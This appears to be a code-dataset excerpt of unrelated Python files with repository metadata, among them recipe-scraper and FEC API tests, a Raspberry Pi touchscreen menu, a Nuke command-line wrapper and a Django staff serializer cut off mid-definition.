elif self.current_state == MediaPlayerMixin.STATE_PAUSED:
logger.debug('Player is paused and had already been started')
logger.debug('Nothing to do')
else:
pass
def stop(self):
if self.current_state == MediaPlayerMixin.STATE_NOT_STARTED:
logger.debug('Player has not been started yet')
logger.debug('Nothing to do')
elif self.current_state == MediaPlayerMixin.STATE_PLAYING:
logger.debug('Player is already playing')
self._stop()
self.current_state = MediaPlayerMixin.STATE_NOT_STARTED
elif self.current_state == MediaPlayerMixin.STATE_PAUSED:
logger.debug('Player is paused and had already been started')
self._stop()
self.current_state = MediaPlayerMixin.STATE_NOT_STARTED
else:
pass
def _play(self):
logger.debug("Playing")
def _resume(self):
logger.debug("Resuming")
def _pause(self):
logger.debug("Pausing")
def _stop(self):
logger.debug("Stopping")
| [
"[email protected]"
]
| |
485ebf8496bd146a42491a9f4317726e7d3725e0 | 79b93d7c36645735309a55973ec54d126956c612 | /Round1B/DraupnirBig.py | bbd9b31b2927243318da8e69786c1f06597f0bb4 | []
| no_license | rocket3989/codeJam2019 | a7523f27c73a8e69c35754ad1737f8587e626c9f | 2d383ef2eefac43a86b24433bb6371961002adc5 | refs/heads/master | 2022-02-28T23:52:56.653242 | 2019-09-25T01:01:43 | 2019-09-25T01:01:43 | 179,910,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | T, M = list(map(int, input().split()))
for test in range(0,T):
r = [0,0,0,0,0,0,0]
inp = []
print(200)
inp.append(int(input()))
print(56)
inp.append(int(input()))
r[6] = (inp[0] % 2 ** 40) // 2 ** 33
inp[0] -= r[6] * 2 ** 33
r[5] = (inp[0] % 2 ** 50) // 2 ** 40
inp[0] -= r[5] * 2 ** 40
r[4] = inp[0] // 2 ** 50
inp[1] -= r[4] * 2 ** 14 + r[5] * 2 ** 11 + r[6] * 2 ** 9
r[3] = (inp[1] % 2 ** 28) // 2 ** 18
inp[1] -= r[6] * 2 ** 18
r[2] = (inp[1] % 2 ** 56) // 2 ** 28
inp[1] -= r[5] * 2 ** 28
r[1] = inp[1] // 2 ** 56
for out in r[1::]:
print(out, end=" ")
print()
res = int(input())
if res == -1:
exit() | [
"[email protected]"
]
| |
e22ed8db69cbcb31a38db3a504b7ff241cb1244b | 49c3166a46e84b193f8b70dfaf12757b8e385348 | /recipe_scrapers/tests/test_thepioneerwoman.py | 3b87fde7e5f2f7de001dc4e29870507d834b482b | [
"MIT"
]
| permissive | buneme/recipe-scrapers | f8f199ee47f52d74ef8813ff6bd1efb70d4064de | 7e3426a5e853335ba0999e2a50b1ea9b98ee429c | refs/heads/master | 2020-04-13T00:27:24.710040 | 2018-11-27T15:31:55 | 2018-11-27T15:31:55 | 162,845,950 | 1 | 0 | MIT | 2018-12-22T22:12:29 | 2018-12-22T22:12:29 | null | UTF-8 | Python | false | false | 2,468 | py | import os
import unittest
from recipe_scrapers.thepioneerwoman import ThePioneerWoman
class TestThePioneerWomanScraper(unittest.TestCase):
def setUp(self):
# tests are run from tests.py
with open(os.path.join(
os.getcwd(),
'recipe_scrapers',
'tests',
'test_data',
'thepioneerwoman.testhtml'
)) as file_opened:
self.harvester_class = ThePioneerWoman(file_opened, test=True)
def test_host(self):
self.assertEqual(
'thepioneerwoman.com',
self.harvester_class.host()
)
def test_title(self):
self.assertEqual(
self.harvester_class.title(),
'Patty Melts'
)
def test_total_time(self):
self.assertEqual(
35,
self.harvester_class.total_time()
)
def test_ingredients(self):
self.assertCountEqual(
[
'1 stick Butter',
'1 whole Large Onion, Halved And Sliced',
'1-1/2 pound Ground Beef',
'Salt And Pepper, to taste',
'5 dashes Worcestershire Sauce',
'8 slices Swiss Cheese',
'8 slices Rye Bread'
],
self.harvester_class.ingredients()
)
def test_instructions(self):
return self.assertEqual(
'In a medium skillet, melt 2 tablespoons of butter over medium-low heat.\n Throw in the sliced onions and cook slowly for 20 to 25 minutes, stirring occasionally, until the onions are golden brown and soft.\n In a medium bowl, mix together the ground beef, salt & pepper, and Worcestershire.\n Form into 4 patties.\nMelt 2 tablespoons butter in a separate skillet over medium heat.\n Cook the patties on both sides until totally done in the middle.\n Assemble patty melts this way: Slice of bread, slice of cheese, hamburger patty, 1/4 of the cooked onions, another slice of cheese, and another slice of bread.\n On a clean griddle or in a skillet, melt 2 tablespoons butter and grill the sandwiches over medium heat until golden brown.\n Remove the sandwiches and add the remaining 2 tablespoons of butter to the skillet.\n Turn the sandwiches to the skillet, flipping them to the other side.\n Cook until golden brown and crisp, and until cheese is melted.\n Slice in half and serve immediately!',
self.harvester_class.instructions()
)
| [
"[email protected]"
]
| |
b8ce6bca58314b866a7d721d90990ae2cc5492a5 | e3e8467a3bae0982bd1ae0a27474e59d61eabe95 | /nukepy | efe0df8dd0ca6a266d16c453902c4d02f54a5aa2 | []
| no_license | LumaPictures/nukecli | d47cd5c5a8d15cf5e584ac5b87362ad5333fa8d6 | 7ca3829cf940a3d836eb0104f41fb00321c9c92c | refs/heads/master | 2020-06-01T04:20:58.804388 | 2011-08-05T23:34:46 | 2011-08-05T23:34:46 | 2,163,112 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | #!/usr/bin/env python
"""
Wrapper for Nuke -t that behaves more like a normal python binary.
- adds support for -c flag to pass a string of python code to execute
- expands symbolic links
- can be used as the interpreter in executable python scripts (e.g. #!/usr/bin/env nukepy)
"""
from __future__ import with_statement
import sys
import os
import subprocess
import tempfile
newArgsList = []
nextIsPyCmd = False
tempFileName = None
try:
for arg in sys.argv[1:]:
if nextIsPyCmd:
nextIsPyCmd = False
fd, tempFileName = tempfile.mkstemp(suffix='.py',
prefix='nukepyCommand',
text=True)
with os.fdopen(fd, 'w') as tempFileHandle:
tempFileHandle.write(arg)
newArgsList.append(tempFileName)
elif arg == '-c':
if tempFileName is not None:
raise Exception('-c argument may only be given once')
nextIsPyCmd = True
elif os.path.islink(arg):
newArgsList.append(os.path.realpath(arg))
else:
newArgsList.append(arg)
procArgs = ["Nuke", "-c", "4G", "-t", "--"] + newArgsList
p = subprocess.Popen(procArgs)
os.waitpid(p.pid, 0)[1]
finally:
if tempFileName:
os.remove(tempFileName)
# this also works but exits in a slightly different way
#/bin/tcsh
#Nuke -t < $*
| [
"[email protected]"
]
| ||
9c32c81ada99ccdd475169383494827f0feba25d | fe06311a7de13a02ca0be37d84c542c3cece3f33 | /Chapter14/file_14_4k.py | c0a727e6cee4b1ac580ff06298411b2c8d3e643c | []
| no_license | mooksys/Python_Algorithms | a4a84ddabc34ec4b7cc0ac01d55019880af38514 | 375817e3dfdec94411cf245fe3f685a69d92b948 | refs/heads/master | 2020-08-24T06:35:05.791979 | 2018-07-30T01:22:24 | 2018-07-30T01:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | import string
print(string.ascii_uppercase) # 출력: ABCDEFGHIJKLMNOPQRSTUVWXYZ
| [
"[email protected]"
]
| |
cbe54232f0be04c15cdde2e8131a03669382f580 | e6d79311f0e020f366f98fd0bb096e66598093e9 | /tests/test_aggregates.py | d9a34c164a72ef523f3854e45375ce6a452ff7f9 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
]
| permissive | adborden/openFEC | b54fb4b0e854d9ad77de738420ea07f714574941 | 53a0a2b1a56292c5ca8e7a3185832baaed4a63d9 | refs/heads/develop | 2021-01-17T15:51:15.486471 | 2016-03-14T16:17:49 | 2016-03-14T16:17:49 | 53,984,188 | 0 | 1 | null | 2016-03-15T22:50:11 | 2016-03-15T22:50:11 | null | UTF-8 | Python | false | false | 10,824 | py | from tests import factories
from tests.common import ApiBaseTest, assert_dicts_subset
from webservices import schemas
from webservices.rest import db, api
from webservices.resources.aggregates import (
ScheduleAByEmployerView,
ScheduleEByCandidateView,
CommunicationCostByCandidateView,
ElectioneeringByCandidateView,
)
from webservices.resources.candidate_aggregates import (
ScheduleABySizeCandidateView,
ScheduleAByStateCandidateView,
TotalsCandidateView,
)
class TestCommitteeAggregates(ApiBaseTest):
def test_stable_sort(self):
rows = [
factories.ScheduleAByEmployerFactory(
committee_id='C001',
employer='omnicorp-{}'.format(idx),
total=538,
)
for idx in range(100)
]
employers = []
for page in range(2):
results = self._results(api.url_for(ScheduleAByEmployerView, sort='-total', per_page=50, page=page + 1))
employers.extend(result['employer'] for result in results)
assert len(set(employers)) == len(rows)
class TestAggregates(ApiBaseTest):
cases = [
(
factories.ScheduleEByCandidateFactory,
ScheduleEByCandidateView,
schemas.ScheduleEByCandidateSchema,
),
(
factories.CommunicationCostByCandidateFactory,
CommunicationCostByCandidateView,
schemas.CommunicationCostByCandidateSchema,
),
(
factories.ElectioneeringByCandidateFactory,
ElectioneeringByCandidateView,
schemas.ElectioneeringByCandidateSchema,
),
]
def setUp(self):
super(TestAggregates, self).setUp()
self.committee = factories.CommitteeHistoryFactory(
name='Ritchie for America',
cycle=2012,
)
self.candidate = factories.CandidateDetailFactory(
candidate_id='P123',
name='Robert Ritchie',
election_years=[2012],
office='P',
)
self.candidate_history = factories.CandidateHistoryFactory(
candidate_id='P123',
name='Robert Ritchie',
election_years=[2012],
two_year_period=2012,
office='P',
)
factories.CandidateElectionFactory(
candidate_id='P123',
cand_election_year=2012,
)
def make_aggregates(self, factory):
return [
factory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committee.committee_id,
cycle=self.committee.cycle,
total=100,
count=5,
),
factory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committee.committee_id,
cycle=self.committee.cycle - 2,
total=100,
count=5,
),
]
def test_candidate_aggregates_by_committee(self):
for factory, resource, schema in self.cases:
aggregates = self.make_aggregates(factory)
results = self._results(
api.url_for(
resource,
committee_id=self.committee.committee_id,
cycle=2012,
)
)
assert len(results) == 1
serialized = schema().dump(aggregates[0]).data
serialized.update({
'committee_name': self.committee.name,
'candidate_name': self.candidate.name,
})
assert results[0] == serialized
def test_candidate_aggregates_by_committee_full(self):
"""For each aggregate type, create a two-year aggregate in the target
election year and a two-year aggregate in the previous two-year period.
Assert that both aggregates are summed when the `election_full` flag is
passed.
"""
for factory, resource, schema in self.cases:
aggregates = self.make_aggregates(factory)
results = self._results(
api.url_for(
resource,
candidate_id=self.candidate.candidate_id,
committee_id=self.committee.committee_id,
cycle=2012,
election_full='true',
)
)
assert len(results) == 1
serialized = schema().dump(aggregates[0]).data
serialized.update({
'committee_name': self.committee.name,
'candidate_name': self.candidate.name,
'total': sum(each.total for each in aggregates),
'count': sum(each.count for each in aggregates),
})
assert results[0] == serialized
def test_candidate_aggregates_by_election(self):
for factory, resource, _ in self.cases:
[
factory(
committee_id=self.committee.committee_id,
candidate_id=self.candidate.candidate_id,
cycle=self.committee.cycle,
),
factory(
cycle=self.committee.cycle,
),
]
results = self._results(
api.url_for(
resource,
office='president',
cycle=2012,
)
)
assert len(results) == 1
assert results[0]['candidate_id'] == self.candidate.candidate_id
class TestCandidateAggregates(ApiBaseTest):
def setUp(self):
super().setUp()
self.candidate = factories.CandidateHistoryFactory(
candidate_id='S123',
two_year_period=2012,
)
self.committees = [
factories.CommitteeHistoryFactory(cycle=2012, designation='P'),
factories.CommitteeHistoryFactory(cycle=2012, designation='A'),
]
factories.CandidateHistoryLatestFactory(
candidate_id=self.candidate.candidate_id,
cand_election_year=2012,
two_year_period=2012,
)
factories.CandidateDetailFactory(
candidate_id=self.candidate.candidate_id,
election_years=[2008, 2012],
)
[
factories.CandidateElectionFactory(
candidate_id=self.candidate.candidate_id,
cand_election_year=election_year
)
for election_year in [2008, 2012]
]
[
factories.CommitteeDetailFactory(committee_id=each.committee_id)
for each in self.committees
]
factories.CandidateTotalFactory(
candidate_id=self.candidate.candidate_id,
cycle=2012,
is_election=True,
receipts=100,
)
factories.CandidateTotalFactory(
candidate_id=self.candidate.candidate_id,
cycle=2012,
is_election=False,
receipts=75,
)
db.session.flush()
# Create two-year totals for both the target period (2011-2012) and the
# previous period (2009-2010) for testing the `election_full` flag
factories.CandidateCommitteeLinkFactory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committees[0].committee_id,
committee_designation='P',
committee_type='S',
fec_election_year=2012,
)
factories.CandidateCommitteeLinkFactory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committees[1].committee_id,
committee_designation='A',
committee_type='S',
fec_election_year=2012,
)
factories.CandidateCommitteeLinkFactory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committees[1].committee_id,
committee_designation='A',
committee_type='S',
fec_election_year=2010,
)
def test_by_size(self):
[
factories.ScheduleABySizeFactory(
committee_id=self.committees[0].committee_id,
cycle=2012,
total=50,
size=200,
),
factories.ScheduleABySizeFactory(
committee_id=self.committees[1].committee_id,
cycle=2012,
total=150,
size=200,
),
]
results = self._results(
api.url_for(
ScheduleABySizeCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
)
)
self.assertEqual(len(results), 1)
expected = {
'candidate_id': self.candidate.candidate_id,
'cycle': 2012,
'total': 200,
'size': 200,
}
self.assertEqual(results[0], expected)
def test_by_state(self):
[
factories.ScheduleAByStateFactory(
committee_id=self.committees[0].committee_id,
cycle=2012,
total=50,
state='NY',
state_full='New York',
),
factories.ScheduleAByStateFactory(
committee_id=self.committees[1].committee_id,
cycle=2012,
total=150,
state='NY',
state_full='New York',
),
]
results = self._results(
api.url_for(
ScheduleAByStateCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
)
)
self.assertEqual(len(results), 1)
expected = {
'candidate_id': self.candidate.candidate_id,
'cycle': 2012,
'total': 200,
'state': 'NY',
'state_full': 'New York',
}
self.assertEqual(results[0], expected)
def test_totals(self):
results = self._results(
api.url_for(
TotalsCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
)
)
assert len(results) == 1
assert_dicts_subset(results[0], {'cycle': 2012, 'receipts': 75})
def test_totals_full(self):
results = self._results(
api.url_for(
TotalsCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
election_full='true',
)
)
assert len(results) == 1
assert_dicts_subset(results[0], {'cycle': 2012, 'receipts': 100})
| [
"[email protected]"
]
| |
b46e91baeb582c1b23025c803fe705dab8582a91 | d2bbf50859beb3447d8e15d5d11f89942f1b21d3 | /Top down design lab/conversion1.py | 56c6680b68b9082c71627b440e82dace9a22c5a0 | []
| no_license | nbenkler/CS110_Intro_CS | f5bc8da21bac9bc4d1c01070b5f7cc75fb3ab012 | 372483bce661ef8052c2ebbe832cc6ec1922d113 | refs/heads/master | 2020-04-24T07:25:26.630687 | 2019-02-21T04:27:55 | 2019-02-21T04:27:55 | 171,798,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | #conversion1.py
# A program to convert Celsius temps to Fahrenheit
def main():
fileName = eval(input("What is the name of the file you would like to convert? "))
inFile = open(fileName, "r")
for line in inFile:
celsius = int(line)
fahrenheit = 9/5 * celsius + 32
print(celsius, "degrees celsius is", fahrenheit, "degrees in Fahrenheit.")
inFile.close()
main()
| [
"[email protected]"
]
| |
8d626cd10ddba11c2cc47aaaae26cca82f16f13d | bb6ebff7a7f6140903d37905c350954ff6599091 | /third_party/WebKit/Source/devtools/scripts/concatenate_js_files.py | 69d776abae74eff185f6689bcb1c595dffa5d111 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | PDi-Communication-Systems-Inc/lollipop_external_chromium_org | faa6602bd6bfd9b9b6277ce3cd16df0bd26e7f2f | ccadf4e63dd34be157281f53fe213d09a8c66d2c | refs/heads/master | 2022-12-23T18:07:04.568931 | 2016-04-11T16:03:36 | 2016-04-11T16:03:36 | 53,677,925 | 0 | 1 | BSD-3-Clause | 2022-12-09T23:46:46 | 2016-03-11T15:49:07 | C++ | UTF-8 | Python | false | false | 4,254 | py | #!/usr/bin/env python
#
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# This script concatenates in place JS files in the order specified
# using <script> tags in a given 'order.html' file.
from __future__ import with_statement
from HTMLParser import HTMLParser
from cStringIO import StringIO
import os.path
import sys
rjsmin_path = os.path.abspath(os.path.join(
os.path.dirname(__file__),
"..",
"..",
"build",
"scripts"))
sys.path.append(rjsmin_path)
import rjsmin
class OrderedJSFilesExtractor(HTMLParser):
def __init__(self, order_html):
HTMLParser.__init__(self)
self.ordered_js_files = []
self.feed(order_html)
def handle_starttag(self, tag, attrs):
if tag == 'script':
attrs_dict = dict(attrs)
if ('type' in attrs_dict and attrs_dict['type'] == 'text/javascript' and 'src' in attrs_dict):
self.ordered_js_files.append(attrs_dict['src'])
class PathExpander:
def __init__(self, paths):
self.paths = paths
def expand(self, filename):
for path in self.paths:
fname = os.path.join(path, filename)
if (os.access(fname, os.F_OK)):
return fname
return None
def main(argv):
if len(argv) < 3:
print('usage: %s order.html input_source_dir_1 input_source_dir_2 ... '
'output_file' % argv[0])
return 1
output_file_name = argv.pop()
input_order_file_name = argv[1]
with open(input_order_file_name, 'r') as order_html:
extractor = OrderedJSFilesExtractor(order_html.read())
expander = PathExpander(argv[2:])
output = StringIO()
for input_file_name in extractor.ordered_js_files:
full_path = expander.expand(input_file_name)
if (full_path is None):
raise Exception('File %s referenced in %s not found on any source paths, '
'check source tree for consistency' %
(input_file_name, input_order_file_name))
output.write('/* %s */\n\n' % input_file_name)
input_file = open(full_path, 'r')
output.write(input_file.read())
output.write('\n')
input_file.close()
if os.path.exists(output_file_name):
os.remove(output_file_name)
output_file = open(output_file_name, 'w')
output_file.write(rjsmin.jsmin(output.getvalue()))
output_file.close()
output.close()
# Touch output file directory to make sure that Xcode will copy
# modified resource files.
if sys.platform == 'darwin':
output_dir_name = os.path.dirname(output_file_name)
os.utime(output_dir_name, None)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| [
"[email protected]"
]
| |
83626a499b71960a0cbd94990cb81f96a5cc2601 | ff69aab96d76ac3dc5b93605617314c6eb2b257c | /gymmeforce/models/__init__.py | 4cedb96b2487ce53f7fda441d4b1d2cc233798a2 | [
"MIT"
]
| permissive | init27Lab/gymmeforce | a9fc7e455b8427ce2c3334e059ee6e532adb3384 | 12731bcf34de9e9a94fae085cdfe10e3f4e0d142 | refs/heads/master | 2021-09-01T12:30:16.508592 | 2017-12-27T01:35:21 | 2017-12-27T01:35:21 | 115,546,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | from gymmeforce.models.base_model import BaseModel
from gymmeforce.models.dqn_model import DQNModel
from gymmeforce.models.vanilla_pg_model import VanillaPGModel
from gymmeforce.models.ppo_model import PPOModel
| [
"[email protected]"
]
| |
c439df6bafaa4167d39bfcd0250e95a1dca7f532 | 79197ddad40d2780a8f291bffa2cb58509c055bb | /Menus/menu-1.py | d09c2355e97f9093a2030524511a2994180fe946 | []
| no_license | Adrien-FILIPPI/Hackbox | 6dd0c66e0fa72a249ee06c6064cbc9bb66eeaa7b | c58495503abc2948ae1d6e2ea1705ee48192f1df | refs/heads/master | 2021-01-25T09:37:59.960101 | 2019-01-08T16:04:38 | 2019-01-08T16:04:38 | 93,864,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,712 | py | #!/usr/bin/env python
import kalipi
from kalipi import *
#############################
## Local Functions ##
# Check VNC status
def check_vnc():
if 'vnc :1' in commands.getoutput('/bin/ps -ef'):
return True
else:
return False
# Check Terminal session status
def check_terminal():
if 'SCREEN -R -S term' in commands.getoutput('/bin/ps -ef'):
return True
else:
return False
## Local Functions ##
#############################
#############################
## Buttons ##
# define all of the buttons
titleButton = Button(" " + kalipi.get_hostname() + " " + kalipi.get_ip(), originX, originX, buttonHeight, buttonWidth * 3 + spacing * 2, tron_blu, tron_ora, titleFont)
button1 = Button(labelPadding * " " + " Exit", originX, originY, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button2 = Button(labelPadding * " " + " X on TFT", originX + buttonWidth + spacing, originY, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button3 = Button(labelPadding * " " + " X on HDMI", originX + (buttonWidth * 2) + (spacing * 2), originY, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button4 = Button(labelPadding * " " + " Shutdown", originX, originY + buttonHeight + spacing, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button5 = Button(labelPadding * " " + " Find IP", originX + buttonWidth + spacing, originY + buttonHeight + spacing, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button6 = Button(labelPadding * " " + " Terminal", originX + (buttonWidth * 2) + (spacing * 2), originY + buttonHeight + spacing, buttonHeight, buttonWidth, tron_blu,tron_whi, labelFont)
button7 = Button(labelPadding * " " + " Reboot", originX, originY + (buttonHeight * 2) + (spacing * 2), buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button8 = Button(labelPadding * " " + " Screen Off", originX + buttonWidth + spacing, originY + (buttonHeight * 2) + (spacing * 2), buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button9 = Button(labelPadding * " " + " >>>", originX + (buttonWidth * 2) + (spacing * 2), originY + (buttonHeight * 2) + (spacing * 2), buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
# Define each button press action
def button(number):
if number == 1:
if button1.disable == 1:
return
# Exit
process = subprocess.call("setterm -term linux -back default -fore white -clear all", shell=True)
pygame.quit()
sys.exit(37)
if number == 2:
if button2.disable == 1:
return
# X TFT
pygame.quit()
## Requires "Anybody" in dpkg-reconfigure x11-common if we have scrolled pages previously
## kalipi.run_cmd("/usr/bin/sudo -u pi FRAMEBUFFER=/dev/fb1 startx")
kalipi.run_cmd("/usr/bin/sudo FRAMEBUFFER=/dev/fb1 startx")
os.execv(__file__, sys.argv)
if number == 3:
if button3.disable == 1:
return
# X HDMI
pygame.quit()
## Requires "Anybody" in dpkg-reconfigure x11-common if we have scrolled pages previously
## kalipi.run_cmd("/usr/bin/sudo -u pi FRAMEBUFFER=/dev/fb0 startx")
kalipi.run_cmd("/usr/bin/sudo FRAMEBUFFER=/dev/fb0 startx")
os.execv(__file__, sys.argv)
if number == 4:
if button4.disable == 1:
return
# Shutdown
pygame.quit()
kalipi.run_cmd("/usr/bin/sudo /sbin/shutdown -h now")
sys.exit()
if number == 5:
if button5.disable == 1:
return
# Find IP
pygame.quit()
kalipi.run_cmd("/opt/hackbox/findip.sh")
os.execv(__file__, sys.argv)
if number == 6:
if button6.disable == 1:
return
# Terminal
process = subprocess.call("setterm -term linux -back default -fore white -clear all", shell=True)
pygame.quit()
kalipi.run_cmd("/usr/bin/sudo -u pi screen -R -S term")
process = subprocess.call("setterm -term linux -back default -fore black -clear all", shell=True)
os.execv(__file__, sys.argv)
if check_terminal():
button6.fntColor = green
button6.draw()
pygame.display.update()
else:
button6.fntColor = tron_whi
button6.draw()
pygame.display.update()
return
if number == 7:
if button7.disable == 1:
return
# Reboot
pygame.quit()
kalipi.run_cmd("/usr/bin/sudo /sbin/shutdown -r now")
sys.exit()
if number == 8:
if button8.disable == 1:
return
# Lock
retPage="menu-1.py"
kalipi.screensaver(retPage)
menu1()
if number == 9:
if button9.disable == 1:
return
# Next page
pygame.quit()
page=os.environ["MENUDIR"] + "menu-2.py"
os.execvp("python", ["python", page])
sys.exit()
## Buttons ##
#############################
def menu1():
# Init Pygame
kalipi.screen()
# Outer Border
kalipi.border(tron_blu)
#############################
## Buttons ##
# Buttons and labels
# See variables at the top of the document to adjust the menu
# Title
titleButton.draw()
# First Row
# Button 1
button1.disable = 0 # "1" disables button
if button1.disable == 1:
button1.draw()
else:
# Add button launch code here
button1.fntColor = yellow
button1.draw()
# Button 2
button2.disable = 0 # "1" disables button
if button2.disable == 1:
button2.draw()
else:
# Add button launch code here
button2.draw()
# Button 3
button3.disable = 0 # "1" disables button
if button3.disable == 1:
button3.draw()
else:
# Add button launch code here
button3.draw()
# Second Row
# Button 4
button4.disable = 0 # "1" disables button
if button4.disable == 1:
button4.draw()
else:
# Add button launch code here
button4.fntColor = yellow
button4.draw()
# Button 5
button5.disable = 0 # "1" disables button
if button5.disable == 1:
button5.draw()
else:
# Add button launch code here
if check_vnc():
button5.fntColor = green
button5.draw()
else:
button5.fntColor = tron_whi
button5.draw()
# Button 6
button6.disable = 0 # "1" disables button
if button6.disable == 1:
button6.draw()
else:
# Add button launch code here
if check_terminal():
button6.fntColor = green
button6.draw()
else:
button6.fntColor = tron_whi
button6.draw()
# Third Row
# Button 7
button7.disable = 0 # "1" disables button
if button7.disable == 1:
button7.draw()
else:
# Add button launch code here
button7.fntColor = yellow
button7.draw()
# Button 8
button8.disable = 0 # "1" disables button
if button8.disable == 1:
button8.draw()
else:
# Add button launch code here
button8.draw()
# Button 9
button9.disable = 0 # "1" disables button
if button9.disable == 1:
button9.draw()
else:
# Add button launch code here
button9.draw()
## Buttons ##
#############################
#############################
## Input loop ##
while 1:
butNo=kalipi.inputLoop("menu-1.py")
button(butNo)
## Input loop ##
#############################
if __name__ == "__main__":
menu1()
| [
"[email protected]"
]
| |
dca6b846e015febbace846cc1f9076f111184cbe | 382034646e9d3e32c8e63e8d83d2dd7da5be4ef3 | /workery/tenant_api/serializers/staff.py | 9988858b14d0cbfa0d3e9175f319d0674e705928 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | wahello/workery-django | 80c88ecb7968951719af6857711891ec3787cf46 | 289318b0333d830c089f4492716c38d409c365ed | refs/heads/master | 2020-03-30T04:21:48.642659 | 2018-09-28T01:30:22 | 2018-09-28T01:30:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,320 | py | # -*- coding: utf-8 -*-
import logging
import phonenumbers
from datetime import datetime, timedelta
from dateutil import tz
from starterkit.drf.validation import (
MatchingDuelFieldsValidator,
EnhancedPasswordStrengthFieldValidator
)
from starterkit.utils import (
get_random_string,
get_unique_username_from_email,
int_or_none
)
from django.conf import settings
from django.contrib.auth.models import Group
from django.contrib.auth import authenticate
from django.db.models import Q, Prefetch
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.utils.http import urlquote
from rest_framework import exceptions, serializers
from rest_framework.response import Response
from rest_framework.validators import UniqueValidator
from shared_api.custom_fields import PhoneNumberField
from shared_foundation.constants import ASSOCIATE_GROUP_ID
from shared_foundation.models import SharedUser
from tenant_foundation.models import (
Comment,
StaffComment,
Staff
)
logger = logging.getLogger(__name__)
class StaffListCreateSerializer(serializers.ModelSerializer):
# OVERRIDE THE MODEL FIELDS AND ENFORCE THE FOLLOWING CUSTOM VALIDATION RULES.
given_name = serializers.CharField(
required=True,
allow_blank=False,
)
last_name = serializers.CharField(
required=True,
allow_blank=False,
)
address_country = serializers.CharField(
required=True,
allow_blank=False,
)
address_region = serializers.CharField(
required=True,
allow_blank=False,
)
address_locality = serializers.CharField(
required=True,
allow_blank=False,
)
postal_code = serializers.CharField(
required=True,
allow_blank=False,
)
street_address = serializers.CharField(
required=True,
allow_blank=False,
)
# We are overriding the `email` field to include unique email validation.
email = serializers.EmailField(
validators=[UniqueValidator(queryset=SharedUser.objects.all())],
required=True,
)
# All comments are created by our `create` function and not by
# `django-rest-framework`.
# comments = StaffCommentSerializer(many=True, read_only=True, allow_null=True)
# This is a field used in the `create` function if the user enters a
# comment. This field is *ONLY* to be used during the POST creation and
# will be blank during GET.
extra_comment = serializers.CharField(write_only=True, allow_null=True)
# This field is used to assign the user to the group.
account_type = serializers.CharField(
write_only=True,
allow_null=False,
required=True
)
# Custom formatting of our telephone fields.
fax_number = PhoneNumberField(allow_null=True, required=False)
telephone = PhoneNumberField(allow_null=True, required=False)
other_telephone = PhoneNumberField(allow_null=True, required=False)
# Add password adding.
password = serializers.CharField(
write_only=True,
required=True,
allow_blank=False,
max_length=63,
style={'input_type': 'password'},
validators = [
MatchingDuelFieldsValidator(
another_field='password_repeat',
message=_("Inputted passwords fields do not match.")
),
EnhancedPasswordStrengthFieldValidator()
]
)
password_repeat = serializers.CharField(
write_only=True,
required=True,
allow_blank=False,
max_length=63,
style={'input_type': 'password'}
)
is_active = serializers.BooleanField(
write_only=True,
required=True,
error_messages={
"invalid": _("Please pick either 'Yes' or 'No' choice.")
}
)
# Meta Information.
class Meta:
model = Staff
fields = (
# Thing
'id',
'created',
'last_modified',
'account_type',
'description',
# Person
'given_name',
'middle_name',
'last_name',
'birthdate',
'join_date',
'gender',
# Misc (Read/Write)
'tags',
